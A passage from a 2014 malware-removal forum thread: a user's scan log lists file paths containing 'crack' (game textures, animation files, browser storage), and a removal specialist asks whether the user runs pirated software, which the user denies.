c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.sw.vtx
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.vvd
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks01.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks01.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks02.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks02.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\temple\crackedrock.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\temple\crackedrock.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\temple\crackedrock_normal.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneyedecals\wall_crack01.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneyedecals\wall_crack01.vtf
c:\users\rarwolf\appdata\local\google\chrome\user data\default\local storage\http_www.cracked.com_0.localstorage
c:\users\rarwolf\appdata\local\google\chrome\user data\default\local storage\http_www.cracked.com_0.localstorage-journal
c:\users\rarwolf\appdata\local\play withsix\tools\mingw\bin\ssh-keygen.exe
c:\users\rarwolf\appdata\local\roblox\versions\version-58bb25d673384171\content\textures\vol_ice_cracked2.dds
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures\wu folder\crackling wu.stk
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\crack2_piv2.stk
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\crack_sidewaysbox.stk
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\buildings\crack.stk
c:\users\rarwolf\rar\pivot animator\stick figures\stick figures\wu folder\crackling wu.stk
scanner sequence 3.ZZ.11.EBLBA0
 ----- EOF ----- 


#14 Naathim


Posted 27 October 2014 - 07:54 AM

Say... are you using pirated software? :rolleyes:


Radek Naathim Pawelczyk

Malware Removal Specialist

 



#15 RaRWolf


Posted 27 October 2014 - 08:18 PM

No, I'm not.





